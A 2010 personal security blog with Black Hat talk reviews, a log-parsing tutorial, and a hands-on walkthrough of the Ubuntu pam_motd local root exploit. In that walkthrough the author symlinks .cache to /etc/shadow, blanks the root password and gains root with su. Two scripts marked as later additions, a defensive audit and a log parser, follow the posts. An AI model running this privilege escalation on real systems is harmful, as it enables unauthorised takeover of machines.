Black Hat Briefings Day 2

July 30th, 2010

I unfortunately was not able to do very much at Black Hat day 2 due to having a ton of work to do to actually make sure the con didn't fall apart. Mainly I got stuck in helping distribute Defcon badges. It was the first time they have actually given out Defcon badges at Black Hat. I did get to see the keynote though. Day 2's keynote was (in my opinion) 100x better than Day 1.

Again, this speaker was obsessed with the word "cyber" but he actually used it where appropriate and where it made sense. As he was of a military background, he was talking about how the military has four domains (land, air, water, space) and they are all made by God (or exist naturally if that is what you prefer) but there is a new domain that they have to take into account that is made by man. This is the "Cyber" domain. The key difference between these domains is not only natural vs. unnatural, but also that you can generally apply the same techniques across the 4 natural domains, and that is not true in the Cyber domain.

I am not going to go into a completely detailed analysis of his talk, but there was nothing that I disagreed with and I thought he was absolutely spot on. Again, I am not sure if I will return next year for the briefings or if I will just go ahead and hit up B-Sides. We will just have to see what happens as it is another full year away.

Black Hat Briefings Day 1

July 28th, 2010

For anyone interested, here is the schedule for what talks I attended today at Black Hat and the ones I plan on going to tomorrow: http://sched.blackhat.com/metacortex. I will go ahead and post my thoughts and opinions on the various talks.

Started out the day like most conference attendees at the Keynote. The keynote was given by some chick from the DHS. Overall opinion, it was pretty lame. She started right off the bat by saying she wasn't a part of the security community and it became very apparent, along with her lack of any technical knowledge. I don't expect her to be "super uber 1337 h@x0R" but to have some knowledge of what she was talking about. She kept relating everything to the Army and had a fetish for the word "cyber-space". I would not be surprised to see the word "cyber-space" in the transcript more than 30 times. After the disappointment of the Keynote I made my way down to go see "WPA Migration Mode: WEP is back to haunt you…"

I was hoping "WPA Migration Mode: WEP is back to haunt you…" would be some new tech for cracking WPA but didn't really know what to expect due to the lack of media coverage. As it turns out, Cisco has this migration mode for when you are moving from WEP to WPA that allows both to be used simultaneously and then just bridges the two together. The entire premise of the talk was that people forget to turn this mode off after fully migrating and thus still accept WEP connections. Although it was not a bad talk, it did not deserve a slot at Black Hat as it is only used by people who

A) Use Cisco wireless gear
B) Try to migrate between WEP and WPA softly
C) Are dumb enough to forget to change it. 

Now, I do not have any personal look into the market and what organizations are doing with their wireless infrastructure but I would imagine that it would be fairly small. In any case, once you find out that they are still accepting WEP connections, it is just business as usual by cracking WEP. I do have to give them a little more credit though. They wrote a patch for aircrack that allowed it to crack this way as it wouldn’t crack it due to a limitation it has for TKIP.

After the WPA stuff I headed down to "Balancing the Pwn Trade Deficit" by the guys at Attack Research. This talk was all about the Chinese hacker scene. It was a really unique talk as they did not take the position of China bashing like it seems the rest of the industry does, and I must say I loved it. They talked about the cultural differences, as you can very clearly see them in their source code where they name things such as variables and functions with J-Pop lyrics. They spent the majority of the time talking about Chinese malware and exploit generators. Going into the talk, I had some small idea about how sophisticated some pieces of malware are, such as the zeus-bot, but I was almost dumbfounded by things such as 24/7 support over phone and QQ (Chinese equivalent to ICQ) as well as having to have active accounts with the creators in order to generate an exploit. In the end, it came down to the fact that the Chinese scene is just like the one here in the States where they have the white/black hat classification as well as similar targets and motivations.

Next up was the talk of the year: Mr. Barnaby Jack with his talk on Jackpotting Automated Teller Machines. Got a nice cozy seat up front due to the Blackhat Jersey. He began by saying that it is not all about the payoff, it was about the journey to the payoff. He went through with us some of his first attempts at getting access into the ATMs using JTAG interfaces and having to get explorer.exe to execute on them (as they all run Windows CE). Once this was demonstrated, he showed us the tool he created for exploiting the ATMs called Dillinger, where you simply connect to the ATM on its management port. Once you can connect to it, you have the choice of testing the exploit, uploading his rootkit, resetting to defaults, retrieving credit card track data, or jackpotting it (photo here). It was incredibly entertaining to see the money fall out of the ATM while it was playing a shitty MIDI song. It was absolutely fantastic and confirmed my opinion that he is just a bad-ass.

Now, I decided to go to one of the most brutal talks I have ever seen. I went and saw "Harder, Better, Faster, Stronger: Semi-Auto Vulnerability Research" by the SourceFire VRT guys. As I am not really good at any type of coding or vulnerability development, a lot of it went way over my head, but they did introduce a tool that looks like it would almost revolutionize that space.

Last talk of the day was the other one that got a lot of hype, "Getting In Bed With Robin Sage". The basic premise was that he got this hot chick's picture and posed as a chick in the security industry. Apparently in the end he was able to get job offers from the likes of Google and Lockheed. This was hands down the worst talk I have ever seen in my entire life. The speaker was so incredibly disorganized that he could not stick to his own slides and spent most of the time getting into it with Chris Nickerson and browsing his file system, taunting people with pictures of incriminating emails but never actually opening them to show people. It was so bad that about half of the people got up and left halfway through, and one guy had to ask him what exactly he did as he never explained exactly what happened and what he did. At that point, I had to get up and walk out as well.

All in all, it was a little above average. There were some awesome talks but some really downer talks as well. We will see what happens tomorrow but I am thinking I may have to just do the whole BSides thing next year.

Another year of Black Hat/Defcon

July 21st, 2010

Black Hat and Defcon are upon us again this year. This means nothing more than covering miles of ground during setup and tear down of training classes and briefing rooms followed by epic parties with free booze supplied by several top names in the industry. Just to set the record straight, I don't go for the parties nor the free room in Caesars for a week and a half, but I go because I always learn so many new things and come away inspired. I am super excited and can't wait to get there.

Exploiting Ubuntu pam_motd vulnerability

July 12th, 2010

There is a PAM vulnerability in unpatched copies of Ubuntu. According to Ubuntu (Article Here) it is an issue with the pam_motd module and it allows /etc/shadow to be modified by an unprivileged user. The shadow file is responsible for keeping the hashed copies of user passwords and is usually referenced in /etc/passwd with a single character of 'x'.

I went ahead and installed a fresh copy of Ubuntu 10.04 Server in a VM to test this out with. The only modification I made was installing ssh.

First thing we want to do is log in


Ubuntu 10.04 LTS ubuntu tty1

ubuntu login: metacortex
Password:

Once I am in, I go ahead and check my current uid


metacortex@ubuntu:~$ id
uid=1001(metacortex) gid=1001(metacortex) groups=1001(metacortex)

Now we can look and see what the default .cache directory contains


metacortex@ubuntu:~$ ls .cache/
motd.legal-displayed

It doesn’t really matter anyway because we are going to go ahead and get rid of it like so


metacortex@ubuntu:~$ rm -rfv .cache/
removed `.cache/motd.legal-displayed'
removed directory: `.cache'

Now to actually take advantage of the vulnerability, we are going to create a soft link to /etc/shadow in place of the .cache directory


metacortex@ubuntu:~$ ln -s /etc/shadow .cache
metacortex@ubuntu:~$ ls -alh
total 20k
drwxr-xr-x 2 metacortex metacortex 4.0k 2010-07-12 14:47 .
drwxr-xr-x 4 root root 4.0k 2010-07-12 14:42 ..
-rw-r--r-- 1 metacortex metacortex 220 2010-04-18 20:15 .bash_logout
-rw-r--r-- 1 metacortex metacortex 3.1k 2010-04-18 20:15 .bashrc
lrwxrwxrwx 1 metacortex metacortex 11 2010-07-12 14:47 .cache -> /etc/shadow
-rw-r--r-- 1 metacortex metacortex 675 2010-04-18 20:15 .profile

With this soft link in place, we have full access to read and write to /etc/shadow


metacortex@ubuntu:~$ vim .cache

In VIM we will see the following


root:*:14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.espM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
".cache" 24L, 839C 1,1 All

Now that we have write access to the shadow file, we can do whatever we want with it, such as completely removing the root password like this


root::14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.espM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
".cache" 24L, 839C 1,1 All

After we save it, we need to re-invoke pam_motd by logging in again


metacortex@ubuntu:~$ ssh localhost
Password:

Now we can feel free to log in as root whenever we would like


metacortex@ubuntu:~$ su -
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#

I am not sure of the exact technical details as to what's wrong with pam_motd, but from what I can tell it allows the motd root access. What I can not figure out is why it does not work the same for /etc/passwd.

*EDIT*
I may have forgotten to re-invoke pam_motd after changing the soft link from shadow to passwd. I am able to own /etc/passwd just as easily as /etc/shadow. I also found this nice little shell script that automates it at packetstorm.
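
The following is an added defender-side check, not code from the original post. It walks the home directories under a base path and reports any user whose .cache entry is a symlink (the legitimate motd.legal-displayed marker lives in a real directory, as the listing above shows), and separately lists accounts in a shadow-format file whose password field is empty, which is the state the edited root line above leaves behind. The base path, the shadow file path and the sample tree it builds are all assumptions made for the example.

```shell
#!/bin/sh
# Added example: audit checks for the pam_motd symlink issue described above.
# Assumptions: home directories live under the directory passed as $1 to
# find_cache_symlinks; a shadow-format file is passed as $1 to find_empty_passwords.

# Print "user:target" for every home whose .cache entry is a symbolic link.
# A normal .cache is a directory, so a symlink there is worth investigating.
find_cache_symlinks() {
    base=$1
    for home in "$base"/*; do
        [ -d "$home" ] || continue
        if [ -L "$home/.cache" ]; then
            printf '%s:%s\n' "$(basename "$home")" "$(readlink "$home/.cache")"
        fi
    done
}

# Print every account whose password field (field 2 of the colon-separated
# shadow record) is empty, i.e. a passwordless login.
find_empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Constructed sample data so the checks can be run offline; prints the temp dir.
make_sample() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/home/alice" "$tmp/home/bob"
    mkdir "$tmp/home/alice/.cache"                 # normal directory
    ln -s /etc/shadow "$tmp/home/bob/.cache"       # the symlink from the post
    printf 'root::14802:0:99999:7:::\n' > "$tmp/shadow"
    printf 'daemon:*:14802:0:99999:7:::\n' >> "$tmp/shadow"
    printf 'bob:$6$constructed$hash:14802:0:99999:7:::\n' >> "$tmp/shadow"
    printf '%s\n' "$tmp"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample)
    find_cache_symlinks "$d/home"      # bob:/etc/shadow
    find_empty_passwords "$d/shadow"   # root
    rm -rf "$d"
fi
```

Run it with --demo to see both checks against the constructed tree, or point the two functions at /home and /etc/shadow as root on a real system.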

Command-line Fu: Parsing logs

July 7th, 2010

Tonight I was going through some output from a very large debug file for a router. The only information I had to go off of was that file. When I say large, I mean 120955 lines of network debug information. It is far too much to go through manually unless you know exactly what you are looking for. It came up that I needed to look at each individual session that ran through the device. Instead of going through line by line looking for each session, I knew I could script it somehow. Just for reference, here is basically what a single packet looks like


Jul 5 10:56:55 10:56:55.923221:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:
Jul 5 10:56:55 10:56:55.923257:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:packet [40] ipid = 24977, @7a2200e8
Jul 5 10:56:55 10:56:55.923276:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:---- flow_process_pkt: (thd 14): flow_ctxt type 13, common flag 0x0, mbuf 0xe50a000, rtbl_idx = 2405
Jul 5 10:56:55 10:56:55.923304:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: flow process pak fast ifl 80 in_ifp reth1.412
Jul 5 10:56:55 10:56:55.923316:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:flow_np_session_id2nsp: NP hdr: session id - 654724464, Flag - 8
Jul 5 10:56:55 10:56:55.923337:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: flow session id 413040
Jul 5 10:56:55 10:56:55.923352:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: vsd 1 is active
Jul 5 10:56:55 10:56:55.923363:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: tcp seq check.
Jul 5 10:56:55 10:56:55.923371:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:mbuf 0xe50a000, exit nh 0xec753c2
Jul 5 10:56:55 10:56:55.923388:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: ----- flow_process_pkt rc 0x0 (fp rc 0)

I figured I should match on the source address and source port. You can see source/destination address and port in the following string of the first line


<10.6.70.1/2750->10.6.132.1/636;6>

The first part of my command to filter out just source address and port was


$ cat debug | grep "\<10.6.70.1\/"

Doing just this gave me a whole bunch of lines. Looking through them, I found that some of them were not the lines I was looking for and had to do with NAT so I refined my command even more by adding another grep command on the end of it


$ cat debug | grep "\<10.6.70.1\/" | grep "matched filter"

Doing this gave me all the lines I wanted. Counting the following output with "wc -l" gave me 2827 lines. This is more manageable than before but still I want to cut out all of the excess fluff on each line and get rid of any duplicate lines. For the fluff, I turned to my friend cut


$ cat debug | grep "\<10.6.70.1\/" | grep "matched filter" | cut -d "<" -f 2

The cut command at the end set a delimiter of the character "<". The delimiter tells it where to break each line up into fields. I then passed it the -f flag to tell it to show the second "field" (basically everything to the right of "<"). This gave me several lines like the following


10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:

I got rid of the fluff at the beginning and now I need to get rid of the fluff at the end


$ cat debug | grep "\<10.6.70.1\/" | grep "matched filter" | cut -d "<" -f 2 | cut -d "-" -f 1

Again, I used cut, this time with the delimiter set to the character "-", and showed the first column (everything to the left of the "-").

With this command I get just the source address and port.


10.6.70.1/2750

All that is left now is to sort them and get rid of any duplicates with the sort and uniq commands


$ cat debug | grep "\<10.6.70.1\/" | grep "matched filter" | cut -d "<" -f 2 | cut -d "-" -f 1 | sort | uniq

Here is an extremely abbreviated output of what I have now


10.6.70.1/2750
10.6.70.1/2752
10.6.70.1/2753
10.6.70.1/2940
10.6.70.1/2941
10.6.70.1/2980
10.6.70.1/2981

Last thing that is left to do is to redirect all that output into its own file


$ cat debug | grep "\<10.6.70.1\/" | grep "matched filter" | cut -d "<" -f 2 | cut -d "-" -f 1 | sort | uniq > sessions

We are now done and I can file this command away for further use.
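
As an added example (not code from the original post), here is the same pipeline wrapped in a reusable function and run over a few constructed debug lines in the format shown above. One caveat worth knowing: in a basic regular expression "\<" is a word-boundary anchor rather than a literal "<", and an unescaped "." matches any character, so the function below uses grep -F to match the "<address/" prefix as a fixed string. The source address, the log file path and the sample lines are assumptions made for the example.

```shell
#!/bin/sh
# Added example: the session-extraction pipeline from the post as a function.
# Assumes the debug format shown above, where each packet opens with a
# "<src/port->dst/port;proto> matched filter" line.

# Print the unique "addr/port" source endpoints seen for $1 in log file $2.
# grep -F matches the literal "<10.6.70.1/" prefix, so lines that merely
# mention the address elsewhere (NAT lines, for example) are not picked up.
# sort -u is equivalent to the post's "sort | uniq".
extract_sessions() {
    src=$1
    logfile=$2
    grep -F "<$src/" "$logfile" \
      | grep -F 'matched filter' \
      | cut -d '<' -f 2 \
      | cut -d '-' -f 1 \
      | sort -u
}

# Constructed sample log: two sessions from 10.6.70.1 (one of them logged
# twice), a line that mentions the address without the "<" prefix, and a
# session from a different host. Prints the temp file path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Jul 5 10:56:55 10:56:55.923221:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:
Jul 5 10:56:55 10:56:55.923257:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:packet [40] ipid = 24977, @7a2200e8
Jul 5 10:56:56 10:56:56.100000:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:
Jul 5 10:56:57 10:56:57.200000:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.1/2752->10.6.132.1/636;6> matched filter TDS_debug:
Jul 5 10:56:58 10:56:58.300000:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:constructed nat line for 10.6.70.1/2753 matched filter TDS_debug:
Jul 5 10:56:59 10:56:59.400000:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.9/4000->10.6.132.1/636;6> matched filter TDS_debug:
EOF
    printf '%s\n' "$f"
}

if [ "${1:-}" = "--demo" ]; then
    log=$(make_sample_log)
    extract_sessions 10.6.70.1 "$log"   # 10.6.70.1/2750 and 10.6.70.1/2752
    rm -f "$log"
fi
```

Against the real debug file the call is simply extract_sessions 10.6.70.1 debug > sessions.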
